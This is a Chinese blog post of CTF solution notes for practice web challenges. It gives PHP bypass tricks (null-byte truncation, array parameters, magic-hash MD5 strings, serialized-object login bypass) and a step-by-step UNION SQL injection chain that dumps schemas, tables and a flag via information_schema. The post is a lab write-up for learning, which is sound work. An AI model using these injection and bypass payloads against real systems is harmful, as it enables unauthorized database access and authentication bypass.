CTF题解

最新推荐文章于 2025-04-23 14:58:31 发布
最新推荐文章于 2025-04-23 14:58:31 发布
阅读量1.7k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41638851/article/details/99221512
版权

文章目录

实验吧

Once more

点击这里

  • %00截断漏洞 ?password=1e7%00*-*
  • 数组漏洞?password[]=9999999
  1. ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字母的字符是大小写敏感的。可选的输入参数规则包含一个数组的所有匹配表达式,他们被正则表达式的括号分组。
  2. 题中ereg()正则限制了password的形式,只能是一个或者多个数字、大小写字母
  3. strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写)
  4. ereg函数存在NULL截断漏洞,导致了正则过滤被绕过,所以可以使用%00截断正则匹配
  5. ereg()只能处理字符串的,遇到数组做参数返回NULL,判断用的是===,要求类型也相同,而NULL跟FALSE类型是不同的,strpos()的参数同样不能为数组,否则返回NULL,而判断用的是 !==,所以这里的条件成立,也能得到flag
  6. %00截断即遇到%00则默认为字符串的结束
  7. 当password为数组时它的返回值不是FALSE

忘记密码了

  1. vim编辑器在对某个文件编辑后,如果非正常退出,会产生一个该文件的临时文件,名字为**.原文件名.swp**。(还有一种获取源码的方式是其备份文件名:原文件名~)

天网管理系统

  1. 240610708,aabg7XSs,aabC9RqS(mod5加密后第一个字符为0)
  2. a:2:{s:4:“user”;b:1;s:4:“pass”;b:1;} (序列化)

简单的SQL注入

  1. 知识点:当空格被过滤时,通常用()或者/**/代替空格

简单的SQL注入之3

  1. 直接拿sqlmap跑,但笔者在跑字段名不行,跑字段内容还是OK的

Webug 显错注入

点击这里
mysql版本大于15,mysql自带information_schema数据库,在SQL注入中可以通过这个数据库获取到各个数据库及其表和字段的信息。

SELECT NAME FROM USER;
SELECT GROUP_CONCAT(NAME) FROM USER;

url:id=3' UNION SELECT 1,GROUP_CONCAT(schema_name) FROM information_schema.SCHEMATA %23

url:id=3' UNION SELECT 1,GROUP_CONCAT(table_name) FROM information_schema.TABLES WHERE table_schema='webug' %23

url:id=3' UNION SELECT 1,GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_name='flag' AND table_schema='webug' %23

url:id=3' UNION SELECT 1,GROUP_CONCAT(id) FROM flag %23

url:id=3' UNION SELECT 1,flag FROM flag where flag.id=1 %23

CTF脚本

点这里

CTFPHP

点这里

学习链接

点这里

greedy-hat
关注
CTF解题笔记(1)
CODING...
01-09 1万+
因缺思汀的绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
CTF 题解
m0_68052766的博客
11-12 570
来自一名CTF新手小白,也是跟着教程慢慢做慢慢学。
CTF入门题_题解
weixin_30795127的博客
11-28 696
题目源文件下载l链接:https://pan.baidu.com/s/1eQO3ccXc6G-qofE6tbR1_g 题目一: 题解: 1.对于本题目,先用UE打开,查看图片的文件头标示是否正确 2.对比源图片,发现格式相符 3.再考虑是否是图片的格式出现了问题呢?于是在网上查看资料,发现调整图片格式的相应操作如下: 相关资料链接:http://blog....
2025版最新网络安全ctf比赛学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!_ctf网络安全大赛官网
Galaxy_0的博客
02-13 1307
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
CTF大赛题解
赵庆明老师
04-11 1955
CTF大赛题解: https://github.com/Jinmo/ctfs/tree/master/2021/0ctf ioa fa51r-re vp https://gist.github.com/Riatre/7626e9bbfbdd08ab0e9306722e3b8b2e ioa https://github.com/mephi42/ctf future tile https://github.com/IRS-Cybersec/ctfdump checkin.md listbook.md uc_ba
ctf 题解
m0_68052766的博客
11-27 644
继续做题
CTF-Mobile-Tutorial:我写的一些Mobile CTF题解
03-28
CTF移动版教程:Java应用安全解析》 在网络安全竞赛(CTF)的世界中,移动平台的安全性逐渐成为关注的焦点。本教程由作者wnagzihxa1n精心整理,旨在帮助初学者理解并掌握移动CTF中的关键知识点,特别是与Java相关...
CTF WEB基础】POST-Bugku CTF题解及知识点
yu_fly_fish的博客
08-03 646
一起变强!
CTF WEB基础】GET-Bugku CTF题解和知识点
yu_fly_fish的博客
08-03 909
一起变强!
CTF部分题解
2402_85002433的博客
04-21 176
2.打开开发者工具(开通过按F12开启),在网络或Network中的Name中选中与已有IP地址内容相同的或者第一个双击打开在第一列中找到password,password对应的第二列内容就是登录密码。:开发者工具打开后网络界面中Name下可能不存在内容,需要刷新启动,password对应密码由系统随机生成有5分钟时限。1.打开实验环境后开启开发者工具(开通过按F12开启),选择源程序或Sources进行查找漏洞,(该实验中并不具有漏洞),但自此之中可知登录密码与password相关。
CTF 部分题解
最新发布
2402_85002433的博客
04-23 405
后打开里边的文件后发现是一个流量包,使用Wireshark过滤出HTTP包查找与对话相关的数据流右击--追踪流--TCP流查看并分析数据包中的的数据,或双击打开数据包,我们发现了用户名和密码。后打开里边的文件后发现是一个流量包,使用Wireshark过滤出FTP包查找含有password的数据流右击--追踪流--TCP流查看并分析数据包中的的数据,我们发现了用户名和密码。题目:安全专家截获了犯罪嫌疑人在线交流的数据包,但无法分析出具体的文件内容,聪明的你能帮帮吗?提示3:转码网站:the-x.cn。
初学ctf的题目解析
07-07
初写ctf的一些方法
CTF题目部分解析
热门推荐
weixin_56817426的博客
05-24 1万+
一、题目一:exe逆向 二、读题 描述:我们获得了敌方某个exe文件,尝试逆向这个exe文件,获得里面的flag{字符串},以SeBaFi{}的形式提交字符串。 三、审题 找到隐藏在exe中的flag。 一、题目二:看本质 二、读题 描述:在渗透过程中,我们要透过现象,看本质。 三、审题 第一步 :打开给出的网页发现是一个扫雷游戏,但是无论选择那种难度游戏开始后都是困难。 一、题目三:apk逆向1 二、读题 找到隐藏在apk中的flag。 三、审题 Jadx打开apk,查看得到答案 flag{01
CTF | CTF比赛题解分享
hackzkaq的博客
10-09 8710
前言:由于此次比赛的题目较多,所以这是这个比赛的第一篇wp,共20题,先记录一下,防止忘记。里面有些题目是新手题较为简单,但也有许多有意思的题目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
CTF竞赛密码学题目解析
白帽子凯哥聊黑客
12-11 4621
CTF(Capture The Flag)竞赛是一个有趣的挑战。密码学是CTF竞赛中的核心元素之一,通常涉及解密、破译密码、理解加密算法等技能。以下是30个题目及答案,新入行的可以看看鸭。
CTF解题思路笔记
山兔的博客
09-13 2860
1.直接查看网页源码,即可找到 flag。 2.robots.txt 3.查看http请求/响应。 4.302跳转的中转网页有信息。 5.查看开发者工具控制台。 6.javascript代码绕过。 7..bash_history。 8.Webshell: 9.ctf之流量分析:Referer来源伪造; 10.X-Forwarded-For:ip 伪造 。 11.User-Agent:用户代理(就是用什么浏览器什么的)。 12.web源码泄漏: vim源码泄漏,如果发现页面上有提示 vi 或vim,说明存在s
CTF题目合集
cgygsw的博客
01-26 4674
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
IDF实验室CTF题解——WEB(更新中,已完成5/7)
乐枕的家
09-19 3461
源IDF实验室CTF训练营-WEB题解1 一种编码而已老题,复制粘贴到console里运行,其实是js代码。 key:WCTF{H3110_J0t4er}2 你关注最新的漏洞吗下载发现是一个数据包,格式转换成pcap格式。 使用WireShark打开之,发现四个包。 协议不熟,查之发现是kerberos。 查了一下协议以及题中提示的漏洞。 第一反应是用漏洞原理破解这个包中的密文找到key之
CTF pwn 方向部分题解
kali_Ma的博客
01-12 1434
dataleak 用”\或者/都可以跳过2个\x00,但是每次用”\会拷贝4个字节到buf中,导致最后的3字节数据无法泄露,所以用/\配合垃圾数据填充来控制泄露字符串。 exp: #!python #coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x
Java环境下F5隐写工具的使用及CTF misc题解
同时,标签“ctf”再次确认了文档在CTF挑战中的实用性和应用背景。 #### 压缩包子文件的知识点: 由于标题和标签已经提供了足够的信息,文件名称列表只提供了“F5-steganography-master”这一信息,这表明压缩包中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值